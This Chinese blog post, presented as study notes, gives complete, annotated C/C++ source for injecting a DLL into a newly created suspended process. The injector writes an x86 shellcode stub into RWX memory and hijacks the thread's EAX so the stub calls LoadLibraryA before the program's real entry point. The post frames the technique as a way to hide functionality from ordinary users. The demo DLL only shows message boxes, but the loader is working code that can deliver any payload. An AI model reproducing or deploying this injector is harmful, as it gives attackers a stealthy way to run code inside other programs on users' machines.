
EXE1调用EXE2来加载DLL实现隐藏功能

2014-02-25 22:23 435 查看
这种方法对普通用户来说不易察觉（但要注意：CreateProcess(CREATE_SUSPENDED) → VirtualAllocEx(可执行内存) → WriteProcessMemory → 修改线程上下文 → ResumeThread 这一串调用本身就是安全软件重点监控的进程注入特征，对检测产品而言并不隐蔽）。基于同一思路还可以做出很多其他变体，这里只是学习记录。

Context.Eip = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
改为
Context.Eax = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
线程在 ring3 执行第一条指令时（32 位 x86 进程），Eax 存放的是线程函数的起始地址，也就是 EXE 的入口点；把它改成 shellcode 的地址，shellcode 执行完再 jmp 回原入口点即可。
这样应该更稳妥：挂起创建的主线程此时还停在 ntdll 的代码里，从 ntdll 走到 EXE 入口点之间还要做不少初始化工作，直接改 Eip 会跳过这些工作，改 Eax 则不会。
学习于 http://bbs.pediy.com/showthread.php?t=159536
自己修改了一下结构。

主CPP ExeOfShellcodeDllInject 代码:

#include "stdafx.h"
#include <Windows.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

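/*
 * Payload image written verbatim into the child process by _tmain.
 *
 * Field order and sizes are part of the shellcode's ABI: the "push imm32"
 * in szShllcode receives the child-side address of szInjectDllPath (offset 0),
 * and the "jmp rel32" is computed from the offset of szShllcode inside this
 * struct. Do not reorder or add fields without updating those computations.
 *
 * The original declared `typedef struct tempData { ... };` with no alias
 * name, so the typedef was meaningless and `(tempData*)` casts only worked
 * in C++; the alias is now declared explicitly.
 */
typedef struct tempData
{
    char szInjectDllPath[MAX_PATH];   /* NUL-terminated name handed to LoadLibraryA in the target */
    char szShllcode[MAX_PATH];        /* x86 stub (ShellCode[] with placeholders patched); raw bytes, not a C string */
} tempData;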

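/*
 * 32-bit x86 stub executed by the target's primary thread before its real
 * entry point. The three 0x12345678 placeholders are patched by _tmain
 * (byte offsets 2, 7 and 15). This array is NOT NUL-terminated: copy it with
 * memcpy(..., sizeof(ShellCode)), never strcpy.
 *
 * Bytes above 0x7F are cast explicitly: brace-initialising a (signed) char
 * with 0xB8/0xD0/0xE9/0xFF is a narrowing conversion, which C++11 rejects
 * and older compilers only warn about.
 */
char ShellCode[] = {
    (char)0x60,                                                     /* pushad                       */
    (char)0x68, (char)0x78, (char)0x56, (char)0x34, (char)0x12,     /* push imm32  -> &szInjectDllPath */
    (char)0xB8, (char)0x78, (char)0x56, (char)0x34, (char)0x12,     /* mov eax,imm32 -> LoadLibraryA   */
    (char)0xFF, (char)0xD0,                                         /* call eax                     */
    (char)0x61,                                                     /* popad                        */
    (char)0xE9, (char)0x78, (char)0x56, (char)0x34, (char)0x12      /* jmp rel32   -> original entry */
};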

/* Zero-filled payload template; _tmain fills both fields before it is written to the child. */
struct tempData g_data = { 0 };
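/* Patch offsets inside ShellCode[] (see the disassembly next to it) and its total length. */
enum
{
    SC_OFF_PUSH_IMM = 2,   /* operand of "push imm32": child-side address of szInjectDllPath */
    SC_OFF_MOV_IMM  = 7,   /* operand of "mov eax,imm32": address of LoadLibraryA */
    SC_OFF_JMP_REL  = 15,  /* operand of "jmp rel32": back to the original entry point */
    SC_LEN          = 19   /* stub length; rel32 is relative to stub + SC_LEN */
};

/* Store a 32-bit immediate into the stub at byte offset off. memcpy replaces the
 * original's unaligned DWORD* store through the char array (alignment/aliasing). */
static void put_dword(char *stub, size_t off, DWORD value)
{
    memcpy(stub + off, &value, sizeof(value));
}

/*
 * Injector entry point (32-bit x86 only: CONTEXT.Eax, DWORD-sized pointers,
 * 32-bit stub).
 *
 * Starts OrdinaryMsg.exe suspended, copies g_data (DLL name + patched stub)
 * into it and points the primary thread's EAX at the stub before resuming.
 * Per the note above, the suspended thread's EAX holds the image entry point
 * that the loader will call, so the stub runs first, calls
 * LoadLibraryA(szInjectDllPath) and then jumps to the original entry point.
 *
 * argc/argv are unused. Returns 0 on success, 1 on any failure (the child is
 * terminated in that case so no half-patched process is left suspended).
 *
 * Fixes relative to the original listing:
 *  - the modified CONTEXT is written back with SetThreadContext; the original
 *    never did, so the child simply started normally;
 *  - the jmp rel32 used sizeof(MAX_PATH) (== sizeof(int)) instead of the
 *    offset of szShllcode, which put the jump target 256 bytes past the real
 *    entry point;
 *  - ShellCode[] is not NUL-terminated, so it is copied with memcpy instead
 *    of strcpy (strcpy read past the end of the array);
 *  - every API result is checked, failures return non-zero, and the process
 *    and thread handles are closed.
 *
 * Caveats: this is the classic suspended-process thread-context hijack; the
 * call sequence is exactly what AV/EDR looks for, so "hard to notice" only
 * applies to a human user. LoadLibraryA's address is read in this process
 * and assumed valid in the child (kernel32 mapped at the same base in both,
 * the normal case within one boot session, but not guaranteed). The DLL is
 * named relatively, so the child's DLL search order decides what loads; use
 * an absolute path for anything beyond a demo.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    char szExePath[] = "OrdinaryMsg.exe";
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    CONTEXT context;
    LPVOID lpData = NULL;
    DWORD dwEntry = 0;   /* original entry point, read from the suspended thread's EAX */
    DWORD dwStub = 0;    /* child-side address of g_data.szShllcode */
    int rc = 1;

    (void)argc;
    (void)argv;

    /* 1. Payload: the DLL name (a C string) plus the unpatched stub (raw bytes, NOT a
     *    C string, hence memcpy with sizeof). g_data is zero-filled, so the remainder
     *    of both arrays stays NUL. */
    strcpy(g_data.szInjectDllPath, "shellcodeDLLInject.dll");
    memcpy(g_data.szShllcode, ShellCode, sizeof(ShellCode));

    /* 2. Start the target suspended: its primary thread has not run any user-mode code yet. */
    if (!CreateProcess(szExePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
    {
        printf("找不到exe\n");
        return 1;
    }

    /* CONTEXT_INTEGER is needed to read EAX now and to write it back below. */
    context.ContextFlags = CONTEXT_INTEGER;
    if (!GetThreadContext(pi.hThread, &context))
    {
        printf("获取线程上下文失败!\n");
        goto cleanup;
    }
    dwEntry = context.Eax;

    /* 3. One region in the child for the whole struct. It is RWX because the DLL name
     *    (data) and the stub (code) share it; a hardened version would allocate RW,
     *    write, then VirtualProtectEx the region to PAGE_EXECUTE_READ. */
    lpData = VirtualAllocEx(pi.hProcess, NULL, sizeof(g_data) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpData == NULL)
    {
        printf("申请内存失败!\n");
        goto cleanup;
    }
    dwStub = (DWORD)lpData + offsetof(struct tempData, szShllcode);

    /* 4. Patch the three placeholders. szInjectDllPath is at offset 0 of the struct,
     *    so its address is lpData itself. rel32 = target - (address of the byte after
     *    the jmp); unsigned wrap-around gives the right two's-complement value for a
     *    backward jump. */
    put_dword(g_data.szShllcode, SC_OFF_PUSH_IMM, (DWORD)lpData);
    put_dword(g_data.szShllcode, SC_OFF_MOV_IMM, (DWORD)LoadLibraryA);
    put_dword(g_data.szShllcode, SC_OFF_JMP_REL, dwEntry - (dwStub + SC_LEN));

    if (!WriteProcessMemory(pi.hProcess, lpData, &g_data, sizeof(g_data), NULL))
    {
        printf("写入内存失败!\n");
        goto cleanup;
    }

    /* 5. Redirect EAX to the stub and write the context back. Without SetThreadContext
     *    the change only lives in our local copy and the child starts untouched. */
    context.Eax = dwStub;
    if (!SetThreadContext(pi.hThread, &context))
    {
        printf("设置线程上下文失败!\n");
        goto cleanup;
    }

    if (ResumeThread(pi.hThread) == (DWORD)-1)
    {
        printf("恢复线程失败!\n");
        goto cleanup;
    }
    rc = 0;

cleanup:
    /* Never leave a half-patched process hanging suspended. */
    if (rc != 0)
    {
        TerminateProcess(pi.hProcess, 1);
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return rc;
}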


将 OrdinaryMsg.exe、shellcodeDLLInject.dll 和主 EXE 放在同一目录下即可运行（DLL 是按相对文件名交给 LoadLibraryA 的，实际加载哪个文件由目标进程的 DLL 搜索顺序决定，正式使用应改为绝对路径）。注意：上面列出的主程序在修改 context.Eax 之后并没有调用 SetThreadContext(pi.hThread, &context) 把上下文写回线程，补上这一行后 shellcode 才会在 ResumeThread 之后执行；另外计算 jmp 偏移时用的 sizeof(MAX_PATH) 实际上等于 sizeof(int)，应改为 szShllcode 在结构体中的偏移（即 MAX_PATH）。

OrdinaryMsg.exe 代码:

#include "stdafx.h"
#include <Windows.h>

#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )

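/*
 * Target program for the injection demo: shows one message box and exits.
 * The /entry:mainCRTStartup pragma above keeps the CRT entry even though the
 * subsystem is windows (no console), so main() remains the user entry point.
 *
 * argc/argv are unused. Always returns 0.
 *
 * The literals are wrapped in TEXT() to match the DLL's DllMain and to build
 * in both ANSI and UNICODE configurations; the original passed narrow
 * literals to the TCHAR MessageBox macro, which only compiles in an ANSI build.
 */
int main(int argc, _TCHAR* argv[])
{
    (void)argc;
    (void)argv;
    MessageBox(NULL, TEXT("OrdinaryMsg"), TEXT("OrdinaryMsg"), MB_OK);
    return 0;
}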
shellcodeDLLInject.dll 代码:

#include "stdafx.h"

/*
 * DLL loaded into the target by the injected stub. Process attach and detach
 * each pop a message box so the injection is visible.
 *
 * hModule: this DLL's base; ul_reason_for_call: DLL_PROCESS_* / DLL_THREAD_*;
 * lpReserved: unused. Always returns TRUE (never refuses to load).
 *
 * NOTE(review): DllMain normally runs with the loader lock held. A MessageBox
 * here is fine for a demo but is among the calls Microsoft advises against in
 * DllMain; real work should be deferred until after DllMain returns.
 */
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD  ul_reason_for_call,
LPVOID lpReserved
)
{
    (void)lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        /* No per-thread attach/detach notifications are needed. */
        DisableThreadLibraryCalls(hModule);
        MessageBox(NULL, TEXT("DLL中非法操作"), TEXT("DLL中非法操作"), MB_OK);
    }
    else if (ul_reason_for_call == DLL_PROCESS_DETACH)
    {
        MessageBox(NULL, TEXT("DLL中非法操作完毕"), TEXT("DLL中非法操作完毕"), MB_OK);
    }

    return TRUE;
}


最后效果为：


